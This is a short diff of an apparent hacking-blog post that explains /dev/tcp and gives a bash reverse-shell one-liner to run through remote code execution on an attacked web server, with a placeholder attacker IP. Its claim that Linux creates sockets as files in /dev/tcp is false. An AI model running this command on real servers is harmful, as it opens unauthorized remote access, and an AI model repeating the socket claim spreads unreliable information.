f1redf0x/exvirion-web/content/posts/qtt_lsof.md

 One thing that only really hackers and Linux devs seem to be aware of is that the mechanism that Linux uses for setting up network connections (sockets) is through creating a socket file attached to the /dev/tcp directory.

-The following command is a standard bind shell command.
+The following command is a standard shell forwarding command.
 Typically, you would use an unprivileged RCE (Like with a web shell) to run the following command on the web server you're attacking:

 ```
 bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1